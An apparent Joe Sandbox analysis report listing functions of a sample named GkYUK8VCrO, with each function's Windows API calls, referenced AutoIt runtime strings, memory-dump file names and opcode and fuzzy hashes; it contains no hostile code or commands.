Opcode Fuzzy Hash: 5172d70984c88d872df5d6293865695662354c02c463190949f207f26bec624d
Instruction Fuzzy Hash: 3CF01231541159BBD7315B92DC0DEBB7A7CEBCAB11F000179F905D20509AA51A12C6B5

Function 00B074D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00B074E5
EnterCriticalSection.KERNEL32(?,?,00AB1044,?,?), ref: 00B074F6
TerminateThread.KERNEL32(00000000,000001F6,?,00AB1044,?,?), ref: 00B07503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00AB1044,?,?), ref: 00B07510

Part of subcall function 00B06ED7: CloseHandle.KERNEL32(00000000,?,00B0751D,?,00AB1044,?,?), ref: 00B06EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 00B07523
LeaveCriticalSection.KERNEL32(?,?,00AB1044,?,?), ref: 00B0752A

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: ee100aad1b349d81583a1e67760f2f5ad310af38ecb2bdceab8960df5e75f309
Instruction ID: 9c356ae674bd78d77f671dd50d5287cedbea11157d5a2150f8a57ae4b346c7ad
Opcode Fuzzy Hash: ee100aad1b349d81583a1e67760f2f5ad310af38ecb2bdceab8960df5e75f309
Instruction Fuzzy Hash: D3F03A3A540613EBDB211B64ED889FA7B7AFF4A302B000571F202A20A4CF755812CE50

Function 00AF8E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00AF8E7F
UnloadUserProfile.USERENV(?,?), ref: 00AF8E8B
CloseHandle.KERNEL32(?), ref: 00AF8E94
CloseHandle.KERNEL32(?), ref: 00AF8E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 00AF8EA5
HeapFree.KERNEL32(00000000), ref: 00AF8EAC

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 28a738d79a816f42713fafd7971e3a1ada91132baa0a66e2ed049b64e7466006
Instruction ID: 6e5791723e9262b0151ee06415fae2be550f3cd7c88d0286fc65a24ac4b21ea2
Opcode Fuzzy Hash: 28a738d79a816f42713fafd7971e3a1ada91132baa0a66e2ed049b64e7466006
Instruction Fuzzy Hash: 83E0C236004002FBDA115FE1ED0C92ABB79FB89322B508230F22992070CF329432DB50

Function 00B18902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B18928
CharUpperBuffW.USER32(?,?), ref: 00B18A37
VariantClear.OLEAUT32(?), ref: 00B18BAF

Part of subcall function 00B07804: VariantInit.OLEAUT32(00000000), ref: 00B07844
Part of subcall function 00B07804: VariantCopy.OLEAUT32(00000000,?), ref: 00B0784D
Part of subcall function 00B07804: VariantClear.OLEAUT32(00000000), ref: 00B07859

Strings

Incorrect Parameter format, xrefs: 00B18960, 00B18B22
AUTOIT.ERROR, xrefs: 00B18A3D

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 0a1bd3f1e9fa6b5a7cd8c8cbfbf38b9b58de1fa39fea5fe0211234d1db34da78
Instruction ID: b8e7c3271817781ae4edfd032548c520a50f40604cd601051da2ae6b92903596
Opcode Fuzzy Hash: 0a1bd3f1e9fa6b5a7cd8c8cbfbf38b9b58de1fa39fea5fe0211234d1db34da78
Instruction Fuzzy Hash: 55917B716083019FC710DF24C5849ABBBE4FF89754F0489AEF89A8B3A1DB31E945CB52

Function 00B02F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00ABFEC6: _wcscpy.LIBCMT ref: 00ABFEE9

_memset.LIBCMT ref: 00B03077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B030A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00B03159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00B03187

Strings

0, xrefs: 00B03063

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: c3e0366cd12edd053d7948961a8556025134d5a364eeec00bd9145fedec45a09
Instruction ID: 8a7e58b7afdc3aad8b5b95ab1830894ec8ee620e78b309415a96c1a65c2086c3
Opcode Fuzzy Hash: c3e0366cd12edd053d7948961a8556025134d5a364eeec00bd9145fedec45a09
Instruction Fuzzy Hash: 2E51E4316093019AD7259F28C949B6BBFECEF89B50F0409AEF885E31D1DB74CE448752

Function 00AFDA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AFDAC5
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00AFDAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00AFDB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AFDB8E

Strings

DllGetClassObject, xrefs: 00AFDB01

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: b8a3ac0f39e81023bc371cbf19537fe450e30b947ef2110623f4c1266ae834cc
Instruction ID: fe7ef9e5497e9efea942412159492fbd449b20a16ecc1582e3e6b297a099cb0e
Opcode Fuzzy Hash: b8a3ac0f39e81023bc371cbf19537fe450e30b947ef2110623f4c1266ae834cc
Instruction Fuzzy Hash: 2F418371600208EFDB16CFA4C984AAABBBAEF44351F1581A9FE059F205D7B1DD45CBA0

Function 00B02C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B02CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B02CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 00B02D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B66890,00000000), ref: 00B02D5A

Strings

0, xrefs: 00B02CA4

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: cd1fb6feac5cd5ac7975a934814f9e54963af26e8d6af386900794773231ac45
Instruction ID: 7f9992dab0c17f8aa7fe41f02cbea37e70a028c98cba65661e8154f40c727c63
Opcode Fuzzy Hash: cd1fb6feac5cd5ac7975a934814f9e54963af26e8d6af386900794773231ac45
Instruction Fuzzy Hash: 384183311043029FD724DF24C889B5BBBE8EF85320F1446ADF965972D1DB70E909CB92

Function 00B1DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B1DAD9

Part of subcall function 00AA79AB: _memmove.LIBCMT ref: 00AA79F9

Strings

cdecl, xrefs: 00B1DB30
stdcall, xrefs: 00B1DB5B
winapi, xrefs: 00B1DB4A
none, xrefs: 00B1DBB4

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 52a09ee6683571e9cb51beddd8f85138c4ecfdcde398e18e637566429960147d
Instruction ID: a3d069502d3f6d66e26732af478cdd8373822d2b1ee6843b6cc72724e39b9a32
Opcode Fuzzy Hash: 52a09ee6683571e9cb51beddd8f85138c4ecfdcde398e18e637566429960147d
Instruction Fuzzy Hash: D0316D71604619AFCF10EF64CD819EFB3F4FF05310B5086A9E866976D1DB71AA45CB80

Function 00AF9372 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7F41: _memmove.LIBCMT ref: 00AA7F82

Part of subcall function 00AFB0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00AFB0E7

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00AF93F6
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00AF9409
SendMessageW.USER32(?,00000189,?,00000000), ref: 00AF9439

Part of subcall function 00AA7D2C: _memmove.LIBCMT ref: 00AA7D66

Strings

ComboBox, xrefs: 00AF9380
ListBox, xrefs: 00AF93B5

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: dbf715d46ecc4d9004b325a643e7d658e33311797297f914af1714abe25a45ef
Instruction ID: 7035e2c12f22c745035758f8df44f1c45314f4a8da13ed7c3e86ff18055bbe46
Opcode Fuzzy Hash: dbf715d46ecc4d9004b325a643e7d658e33311797297f914af1714abe25a45ef
Instruction Fuzzy Hash: 6821E171A00108AEDB14ABB0DC85EFFB7B8DF16360B104129FA25972E1DB354A0A9A20

Function 00B26656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00AA1D73
Part of subcall function 00AA1D35: GetStockObject.GDI32(00000011), ref: 00AA1D87
Part of subcall function 00AA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00AA1D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B266D0
LoadLibraryW.KERNEL32(?), ref: 00B266D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B266EC
DestroyWindow.USER32(?), ref: 00B266F4

Strings

SysAnimate32, xrefs: 00B266AB

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 563ccc46e3293354b2c5d260528db4627f1dd530176dadfad313ea037b7ec801
Instruction ID: 4152cef664ff0d9d7edb90195836957fcebe292880ff3e16b34fea83a682df89
Opcode Fuzzy Hash: 563ccc46e3293354b2c5d260528db4627f1dd530176dadfad313ea037b7ec801
Instruction Fuzzy Hash: 37219D71200216BBEF124F64FC80EBB37EDEB59368F104669F919931A0DB71CC519760

Function 00B0703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00B0705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B07091
GetStdHandle.KERNEL32(0000000C), ref: 00B070A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00B070DD

Strings

nul, xrefs: 00B070D8

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: dca6d77f4a3547d0b0e9cd44045816395afd0e5154e8ee430bbb64f62d7e239b
Instruction ID: 78d781778aa9316ea5163c781adc9dc44057b40086de5fda0ce4c2b96ec9bd5c
Opcode Fuzzy Hash: dca6d77f4a3547d0b0e9cd44045816395afd0e5154e8ee430bbb64f62d7e239b
Instruction Fuzzy Hash: 5A215374944206ABDB209F68DC45A9ABBF4FF45720F2087A9FCA1D72D0EB70A851CB50

Function 00B0710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00B0712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B0715D
GetStdHandle.KERNEL32(000000F6), ref: 00B0716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00B071A8

Strings

nul, xrefs: 00B071A3

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: a3f95b9b954e330c5aa27aca2691f03f16122a0f52468abcb13cb854a9e30997
Instruction ID: 8bc39151a09bd19b93f0b7d04f288e90e84b8f2f9f93de35f9253752af7b3ae7
Opcode Fuzzy Hash: a3f95b9b954e330c5aa27aca2691f03f16122a0f52468abcb13cb854a9e30997
Instruction Fuzzy Hash: 0A217475A442069BDB209F689C44AA9BBE8FF55720F200699FDA1E72D0DF70B8518B50

Function 00B0AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B0AEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B0AF13
__swprintf.LIBCMT ref: 00B0AF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,00B2F910), ref: 00B0AF6A

Strings

%lu, xrefs: 00B0AF26

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 8ca8c200655b73454a23a92b056151d4c03d415f3dd24948341228ebfcb18c19
Instruction ID: 4b654dc46eb9ed892e83e974329b41b31d6b53dbb8607371610739b0cb139b9c
Opcode Fuzzy Hash: 8ca8c200655b73454a23a92b056151d4c03d415f3dd24948341228ebfcb18c19
Instruction Fuzzy Hash: AF214435A00209AFCB10EF64C985DAE7BF8EF49704B1040A9F909EB251DB31EA45CB61

Function 00AFA52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7D2C: _memmove.LIBCMT ref: 00AA7D66

Part of subcall function 00AFA37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00AFA399
Part of subcall function 00AFA37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00AFA3AC
Part of subcall function 00AFA37C: GetCurrentThreadId.KERNEL32 ref: 00AFA3B3
Part of subcall function 00AFA37C: AttachThreadInput.USER32(00000000), ref: 00AFA3BA

GetFocus.USER32 ref: 00AFA554

Part of subcall function 00AFA3C5: GetParent.USER32(?), ref: 00AFA3D3

GetClassNameW.USER32(?,?,00000100), ref: 00AFA59D
EnumChildWindows.USER32(?,00AFA615), ref: 00AFA5C5
__swprintf.LIBCMT ref: 00AFA5DF

Strings

%s%d, xrefs: 00AFA5D9

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf_memmove
String ID: %s%d
API String ID: 1941087503-1110647743
Opcode ID: 6a314ff70b5851fea652281f0b23ea98b4fcbfdcf63760e1c9b4b7782270e2a7
Instruction ID: d5f85928fa017fbc0c57b6b365056dd250d1d3fc56f54d15907ade2c30b4b5a2
Opcode Fuzzy Hash: 6a314ff70b5851fea652281f0b23ea98b4fcbfdcf63760e1c9b4b7782270e2a7
Instruction Fuzzy Hash: F311AFB5600209BBDF11BFA0DD85FFA37BCEF59700F0440B5BA0CAA192CA7059468B75

Function 00B02017 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B02048

Strings

REMOVE, xrefs: 00B0204E
KEYS, xrefs: 00B0205F
APPEND, xrefs: 00B02081
EXISTS, xrefs: 00B02070

Memory Dump Source

Source File: 00000000.00000002.1681808111.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1681796202.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681848314.0000000000B55000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681884037.0000000000B5F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B68000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000B6C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1681899027.0000000000BA8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_GkYUK8VCrO.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: c59892e158a1062803558a1da6bcffe6b13105a09aedc1de6265fa1199138f1c
Instruction ID: c6ff115ff2d39a5f4b96c72a6b81257fbc03d1b5e25a05678971bd1fb52a436b
Opcode Fuzzy Hash: c59892e158a1062803558a1da6bcffe6b13105a09aedc1de6265fa1199138f1c
Instruction Fuzzy Hash: F8111E31910209DFCF50EFA4D9519EEB7F4FF16304B5085E9D85667291EB325E0ACB50

Function 00B1EE69 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B1EF1B
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B1EF4B
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00B1F07E
CloseHandle.KERNEL32(?), ref: 00B1F0FF

